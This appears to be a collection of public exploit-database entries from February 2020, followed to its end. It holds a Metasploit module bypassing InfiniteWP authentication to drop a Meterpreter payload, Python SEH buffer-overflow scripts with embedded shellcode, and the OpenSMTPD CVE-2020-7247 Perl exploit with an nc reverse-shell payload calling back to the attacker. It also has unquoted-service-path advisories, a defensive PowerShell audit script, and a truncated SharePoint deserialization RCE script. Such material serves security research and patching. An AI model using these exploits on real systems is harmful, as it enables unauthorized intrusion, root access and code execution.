        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\FreeSSHDService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FreeSSHDService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
-
Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.syncbreeze.com
Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)

C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Sync Breeze Enterprise    C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe    Auto

C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
      'Description'    => %q{
        This module exploits an authentication bypass in the WordPress
        InfiniteWP Client plugin to log in as an administrator and execute
        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.

        The module will attempt to retrieve the original PLUGIN_FILE contents
        and restore them after payload execution. If VerifyContents is set,
        which is the default setting, the module will check to see if the
        restored contents match the original.

        Note that a valid administrator username is required for this module.
        WordPress >= 4.9 is currently not supported due to a breaking
        WordPress API change. Tested against 4.8.3.
      },
      'Author'         => [
        'WebARX', # Discovery
        'wvu'     # Module
      ],
      'References'     => [
        ['WPVDB', '10011'],
        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
      ],
      'DisclosureDate' => '2020-01-14',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
    ))

    register_options([
      OptString.new('USERNAME', [true, 'WordPress username', 'admin']),
      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
    ])

    register_advanced_options([
      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def plugin_file
    datastore['PLUGIN_FILE']
  end

  def plugin_uri
    normalize_uri(wordpress_url_plugins, plugin_file)
  end

  def check
    unless wordpress_and_online?
      return CheckCode::Unknown('Is the site online and running WordPress?')
    end

    unless (version = wordpress_version)
      return CheckCode::Unknown('Could not detect WordPress version')
    end

    if Gem::Version.new(version) >= Gem::Version.new('4.9')
      return CheckCode::Safe("WordPress #{version} is an unsupported target")
    end

    vprint_good("WordPress #{version} is a supported target")

    check_version_from_custom_file(
      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
      /^= ([\d.]+)/,
      '1.9.4.5'
    )
  end

  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
  def auth_bypass
    json = {
      'iwp_action' => %w[add_site readd_site].sample,
      'params'     => {'username' => username}
    }.to_json

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => wordpress_url_backend,
      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
    )

    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
    end

    print_good("Successfully obtained cookie for #{username}")
    vprint_status("Cookie: #{cookie}")

    cookie
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Bypassing auth for #{username} at #{full_uri}")

    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
      fail_with(Failure::NoAccess, "Could not log in as #{username}")
    end

    print_good("Successfully logged in as #{username}")

    write_and_exec_payload
  end

  def write_and_exec_payload
    print_status("Retrieving original contents of #{plugin_uri}")

    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents
      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
    end

    print_good("Successfully retrieved original contents of #{plugin_uri}")
    vprint_status('Contents:')
    print(contents)

    print_status("Overwriting #{plugin_uri} with payload")

    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
    end

    print_good("Successfully overwrote #{plugin_uri} with payload")

    print_status("Requesting payload at #{plugin_uri}")

    send_request_cgi({
      'method' => 'GET',
      'uri'    => plugin_uri
    }, 0)

    restore_contents(contents)
  end

  def restore_contents(og_contents)
    print_status("Restoring original contents of #{plugin_uri}")

    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
    end

    return unless datastore['VerifyContents']

    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents == og_contents
      fail_with(Failure::UnexpectedReply,
                "Current contents of #{plugin_uri} DO NOT match original!")
    end

    print_good("Current contents of #{plugin_uri} match original!")
  end

end
-
Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksorter.com
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)

C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
Disk Sorter Enterprise    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe    Auto

C:\Users\terran>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004bb51)
#0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
long_buffer = "\x44" * 600

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode + long_buffer

try:
    f=open("name.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksavvy.com
Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe
Version: 12.3.18
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """
Disk Savvy Enterprise    C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe    Auto

C:\Users\nightelf>sc qc "Disk Savvy Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Savvy Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Savvy Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
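The two advisories above (Disk Sorter Enterprise and Disk Savvy Enterprise) show the same misconfiguration: an auto-start service running as LocalSystem whose BINARY_PATH_NAME contains spaces but is not quoted. The wmic/findstr pipeline they use is a one-off check; the PowerShell below is an added audit and remediation script, not part of either advisory, that finds every such service on a host and can quote the path. It assumes the executable part of the command line ends at the first ".exe" (anything after that is treated as arguments) and that the ImagePath registry value is what "sc qc" reports as BINARY_PATH_NAME.

```powershell
# Added example (not from the advisories): audit a Windows host for auto-start
# services whose unquoted binary path contains a space, and optionally fix them.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        # The advisories filter out C:\Windows\ paths; pass this switch to include them.
        [switch]$IncludeWindowsDir
    )

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            # Executable part of the command line: up to and including the first ".exe"
            # (assumption). If no ".exe" is present the whole value is used, which may
            # include arguments and so can produce a false positive worth eyeballing.
            $exe = if ($_.PathName -match '^(?<exe>.*?\.exe)') { $Matches['exe'] } else { $_.PathName }
            $inWindows = $exe -match '^[A-Za-z]:\\Windows\\'

            if ($exe -match ' ' -and ($IncludeWindowsDir -or -not $inWindows)) {
                [pscustomobject]@{
                    Name      = $_.Name
                    StartMode = $_.StartMode
                    RunAs     = $_.StartName
                    PathName  = $_.PathName
                    # Same command line with the executable wrapped in quotes.
                    FixedPath = '"' + $exe + '"' + $_.PathName.Substring($exe.Length)
                }
            }
        }
}

function Repair-UnquotedServicePath {
    # Writes the quoted command line back to the service's ImagePath value (the value
    # "sc qc" prints as BINARY_PATH_NAME). Needs an elevated shell; the change takes
    # effect the next time the service starts. Supports -WhatIf for a dry run.
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [pscustomobject]$Finding
    )
    process {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Finding.Name)"
        if ($PSCmdlet.ShouldProcess($Finding.Name, "Set ImagePath to $($Finding.FixedPath)")) {
            # ExpandString keeps the value REG_EXPAND_SZ, which the service control
            # manager expands; it is also safe for paths that were plain REG_SZ.
            Set-ItemProperty -Path $key -Name ImagePath -Value $Finding.FixedPath -Type ExpandString
        }
    }
}

# Usage:
#   Get-UnquotedServicePath | Format-Table Name, StartMode, RunAs, PathName -AutoSize
#   Get-UnquotedServicePath | Where-Object StartMode -eq 'Auto' | Repair-UnquotedServicePath -WhatIf
```

Run the audit on a fresh build and after each third-party install; a finding that runs as LocalSystem with StartMode Auto, like the two services above, is the case to fix first. Quoting the path is the vendor-independent fix; the other half of the risk is the ACL on each directory along the path, which this script does not check.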
-
Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x100411fc)
#0x100411fc : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
long_buffer = "\x44" * 600

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode + long_buffer

try:
    f=open("name.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution
# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation
# Date: 2020-02-02
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.opensmtpd.org/
# Version: OpenSMTPD 6.4.0 - 6.6.1
# Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1
# CVE: CVE-2020-7247

#!/usr/bin/perl
#
# raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD
# Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and
# other products, allows remote attackers to execute arbitrary commands as root
# via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL
# FROM field. This affects the "uncommented" default configuration. The issue
# exists because of an incorrect return value upon failure of input validation
# (CVE-2020-7247).
#
# "Wow. I feel all butterflies in my tummy that bugs like this still exist.
# That's awesome :)" -- skyper
#
# This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to
# root on OpenBSD in the default configuration, or execute remote commands as
# root (only in OpenSMTPD "uncommented" default configuration).
#
# See also:
# https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
# https://www.kb.cert.org/vuls/id/390745/
# https://www.opensmtpd.org/security.html
#
# Usage (LPE):
# phish$ uname -a
# OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64
# phish$ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel)
# phish$ ./raptor_opensmtpd.pl LPE
# [...]
# Payload sent, please wait 5 seconds...
# -rwsrwxrwx  1 root  wheel  12432 Feb  1 21:20 /usr/local/bin/pwned
# phish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Usage (RCE):
# raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org
# [...]
# Payload sent, please wait 5 seconds...
# /bin/sh: No controlling tty (open /dev/tty: Device not configured)
# /bin/sh: Can't find tty file descriptor
# /bin/sh: warning: won't have full job control
# phish# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
#
# Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1):
# OpenBSD 6.6 [tested]
# OpenBSD 6.5 [untested]
# OpenBSD 6.4 [untested]
# Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested]
# Other Linux distributions [untested]
# FreeBSD [untested]
# NetBSD [untested]
#

use IO::Socket::INET;

print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n";
print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n";

$usage = "Usage:\n" .
         "$0 LPE\n" .
         "$0 RCE <remote_host> <local_host> [<domain>]\n";
$lport = 4444;

($type, $rhost, $lhost, $domain) = @ARGV;
die $usage if (($type ne "LPE") && ($type ne "RCE"));

# Prepare the payload
if ($type eq "LPE") { # LPE
	$payload = "cp /bin/sh /usr/local/bin/pwned\n" .
	           "echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n" .
	           "gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned";
	$rhost = "127.0.0.1";
} else { # RCE
	die $usage if ((not defined $rhost) || (not defined $lhost));
	$payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|" .
	           "nc $lhost $lport >/tmp/f";
}

# Open SMTP connection
$| = 1;
$s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n";

# Read SMTP banner
$r = <$s>; print "< $r";
die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/);

# Send HELO
$w = "HELO fnord"; print "> $w\n"; print $s "$w\n";
$r = <$s>; print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send evil MAIL FROM
$w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>";
print "> $w\n"; print $s "$w\n";
$r = <$s>; print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send RCPT TO
if (not defined $domain) {
	$rcpt = "<root>";
} else {
	$rcpt = "<root\@$domain>";
}
$w = "RCPT TO:$rcpt"; print "> $w\n"; print $s "$w\n";
$r = <$s>; print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send payload in DATA
$w = "DATA"; print "> $w\n"; print $s "$w\n";
$r = <$s>; print "< $r";
$w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n.";
#print "> $w\n"; # uncomment for debugging
print $s "$w\n";
$r = <$s>; print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Close SMTP connection
$s->close();
print "\nPayload sent, please wait 5 seconds...\n";

# Got root?
if ($type eq "LPE") { # LPE
	sleep 5;
	print `ls -l /usr/local/bin/pwned`;
	exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n";
} else { # RCE
	exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat
	#exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat
}
-
MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-11
#Vendor Homepage : http://www.ivideogo.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
#2. Just copy the text inside "Shell.txt".
#3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" .
#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004f3e3)
#0x1004f3e3 : pop ebx # pop esi # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode

try:
    f=open("Shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
Microsoft SharePoint - Deserialization Remote Code Execution
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys
from xml.sax.saxutils import escape
from lxml import html
import codecs
import readline
from clint.arguments import Args
import signal

def serialize_command(cmd):
    # Each character becomes its UTF-16BE hex form with the nibble order reversed
    total = ""
    for x in cmd:
        a = codecs.encode(x,"utf-16be")
        b = codecs.encode(a,"hex").decode('ascii')
        total += b[::-1]
    return total

def deserialize_command(cmd):
    # Inverse of serialize_command: 4 hex digits per character
    length = len(cmd)
    s = ""
    for i in range(0,length,4):
        character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3]
        character = character[::-1]
        c_hex = codecs.decode(character,"hex")
        a = codecs.decode(c_hex,"utf-16be")
        s += a
    return s

#######################################
signal.signal(signal.SIGINT, signal.default_int_handler)
args = Args()
myargs = dict(args.grouped)

if '--help' in myargs or '-h' in myargs:
    help = """
desharialize options:
    -h --help    - This menu
    -u --url     - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx )
    -c --command - The command to run on the target Sharepoint server.
    -f --file    - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping)
"""
    print (help)
    exit(0)

url = ''
cmd = ''
filename = ''
if '--url' in myargs or '-u' in myargs:
    try:
        url = myargs['--url'][0]
    except:
        url = myargs['-u'][0]
if '--command' in myargs or '-c' in myargs:
    if '--file' in myargs or '-f' in myargs:
        print("Can't use both command and file options at the same time!")
        exit(0)
    try:
        cmd = myargs['--command'][0]
    except:
        cmd = myargs['-c'][0]
if '--file' in myargs or '-f' in myargs:
    try:
        filename = myargs['--file'][0]
    except:
        filename = myargs['-f'][0]
    file = open(filename,mode='r')
    cmd = file.read()
    file.close()

sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"
sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"
sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"

PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
    string_types = str,
    raw_input = input
else:
    string_types = basestring,

if url == '':
    url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:")

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',
}
firstcall = requests.get(url,headers=headers)
# The MicrosoftSharePointTeamServices header leaks the major version (14/15/16)
spheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16')
spheader = int(spheader.split('.')[0])

payload = "__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"

assemblyvalue = sharepoint2019and2016
if spheader == 15:
    assemblyvalue = sharepoint2013
elif spheader == 14:
    assemblyvalue = sharepoint2010
else:
    assemblyvalue = sharepoint2019and2016
FullURL = url + assemblyvalue

secondcall = requests.get(FullURL,headers=headers)
secondcalltext = secondcall.text
tree = html.fromstring(secondcall.content)
viewstate = ''
eventvalidation = ''
try:
    viewstate = tree.get_element_by_id('__VIEWSTATE')
    viewstate = viewstate.value
except:
    pass
try:
    eventvalidation = tree.get_element_by_id('__EVENTVALIDATION')
    eventvalidation = eventvalidation.value
except:
    pass

if cmd == '':
    cmd = raw_input("Write your full command here to execute on the test target system (Make sure you have permissions from system owner):")

# HTML-escape the command before it is embedded in the XML payload
# (the entity names were lost in extraction and are restored here)
#escapedcmd = escape(cmd,html_escape_table)
cmd = cmd.replace("&","&amp;")
cmd = cmd.replace(">","&gt;")
cmd = cmd.replace("<","&lt;")
cmd = cmd.replace("\"","&quot;")
